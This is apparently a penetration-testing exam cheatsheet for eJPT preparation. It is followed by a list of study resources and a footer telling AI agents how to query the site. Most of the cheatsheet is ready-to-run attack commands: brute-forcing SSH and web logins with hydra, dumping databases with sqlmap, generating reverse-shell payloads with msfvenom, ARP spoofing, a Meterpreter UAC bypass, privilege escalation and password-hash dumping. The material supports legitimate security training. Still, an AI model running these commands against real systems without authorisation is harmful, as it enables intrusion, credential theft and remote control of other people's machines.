# eJPT-Cheatsheet ## Command Cheetsheet: ### Nmap nmap -sn 10.10.10.0/24\ nmap -sV -p- -iL targets -oN nmap.initial -v\ nmap -A -p- -iL targets -oN nmap.aggressive -v\ nmap -p --script=vuln -v ### fPing fping -a -g 10.10.10.0/24 2>/dev/null > targets ### IP Route **Syntax**\ ip route add \ via \ dev \\ eg.\ ip route add 10.10.10.0/24 via 10.10.11.1 dev tap0 ### John john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5\ unshadow passwd shadow > unshadowed.txt\ john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt ### dirb dirb \ dirb -u admin:admin *I suggest you to use dirbuster for better speed. Keep the threads at 20. Use /usr/share/wordlists/dirb/common.txt wordlist.* ### Netcat **Listening for reverse shell**\ nc -nvlp 1234 **Banner Grabbing**\ nc -nv 10.10.10.10 \ ### SQLMap **Check if injection exists** sqlmap -r Post.req\ sqlmap -u "" -p id\ sqlmap -u "" --data="user=admin\&password=admin" **Get database if injection Exists** sqlmap -r login.req --dbs\ sqlmap -u "" -p id --dbs\ sqlmap -u "" --data="user=admin\&password=admin" --dbs\\ **Get Tables in a Database** sqlmap -r login.req -D dbname --tables\ sqlmap -u "" -p id -D dbname --tables\ sqlmap -u "" --data="user=admin\&password=admin" -D dbname --tables **Get data in a Database tables** sqlmap -r login.req -D dbname -T table\_name --dump\ sqlmap -u "" -p id -D dbname -T table\_name --dump\ sqlmap -u "" --data="user=admin\&password=admin" -D dbname -T table\_name --dump ### Hydra **SSH Login Bruteforcing**\ hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u 10.10.10.10 ssh\ hydra -v -V -u -l root -P passwords.txt -t 1 -u 10.10.10.10 ssh\ \&#xNAN;*You can use same for FTP, just replace ssh with ftp* **HTTP POST Form**\ hydra http-post-form "/login.php:user=^USER^\&password=^PASS^:Incorrect credentials" -L usernames.txt -P passwords.txt -f -V *You will know which wordlists to use when the time comes* ### XSS \\ \ *This is a great filter bypass cheatsheet*\ ### msfvenom shells **JSP Java Meterpreter Reverse TCP**\ msfvenom -p java/jsp\_shell\_reverse\_tcp LHOST= LPORT= -f raw > shell.jsp **WAR**\ msfvenom -p java/jsp\_shell\_reverse\_tcp LHOST= LPORT= -f war > shell.war **PHP**\ msfvenom -p php/meterpreter\_reverse\_tcp LHOST= LPORT= -f raw > shell.php\ cat shell.php | pbcopy && echo '\ shell.php && pbpaste >> shell.php ### Metasploit Meterpreter autoroute run autoroute -s 10.10.10.0/24 ### ARPSpoof echo 1 > /proc/sys/net/ipv4/ip\_forward\ arpspoof -i -t -r\ arpspoof -i tap0 -t 10.100.13.37 -r 10.100.13.36 ### SMB Enumeration **Get shares, users, groups, password policy**\ smbclient -L //10.10.10.10/\ enum4linux -U -M -S -P -G 10.10.10.10\ nmap --script=smb-enum-users,smb-os-discovery,smb-enum-shares,smb-enum-groups,smb-enum-domains 10.10.10.10 -p 135,139,445 -v\ nmap -p445 --script=smb-vuln-\* 10.10.10.10 -v **Access Share**\ smbclient //10.10.10.10/share\_name ### FTP Enumeration nmap --script=ftp-anon 10.10.10.10 -p21 -v\ nmap -A -p21 10.10.10.10 -v **Login to FTP server**\ ftp 10.10.10.10 ### Meterpreter ps\ getuid\ getpid\ getsystem\ ps -U SYSTEM **CHECK UAC/Privileges**\ run post/windows/gather/win\_privs **BYPASS UAC**\ \&#xNAN;*Background the session first*\ exploit/windows/local/bypassuac\ set session **After PrivEsc**\ migrate \\ hashdump ### Windows Command Line **To search for a file starting from current directory**\ dir /b/s "\*.conf\*"\ dir /b/s "\*.txt\*"\ dir /b/s "\*filename\*" **Check routing table**\ route print\ netstat -r **Check Users**\ net users **List drives on the machine**\ wmic logicaldisk get Caption,Description,providername ## Notes: * * * * * ## External Resources: ``` Mayur Parmar(th3cyb3rc0p) Social Media Handles: Linkedin: https://www.linkedin.com/in/th3cyb3rc0p/ Twitter: https://twitter.com/th3cyb3rc0p Instagram: https://www.instagram.com/th3cyb3rc0p/ Note: all credit goes to respected authors. ``` ### Notes:
### Resources: All in one playlist:
### Prerequisites:
### Programming: C++: python: (Hindi) python: (English) Bash scripting:
### Penetration Testing Basics: #### OSINT: \
#### Subdomain enumeration:
#### Nmap:
#### Masscan:
#### Nessus: (Hindi)
#### Netcat:
#### Dirbuster:
#### Cross-site scripting(Xss):
#### SQL injection:
#### Sqlmap:
#### John the Ripper:
#### Hashcat:
#### Hydra:
#### Null session attack:
#### Metasploit:
#### Wordlist:
### TryHackME Rooms: (P): indicates need paid subscription of tryhackme
#### Fundamentals:
#### Linux:
#### Tools: (P)
#### Programming: (P) (P)
#### Privillage escalation: (P) (P)
#### Cryptography: (P)
#### Web attacks: (P) (P) (P) (P) (P)
#### Misc:
#### Paid(required tryhackme premium subscription):
### Course Review:
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://methodological-notes.gitbook.io/ejptv2-preparation/ejpt-cheatsheet.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.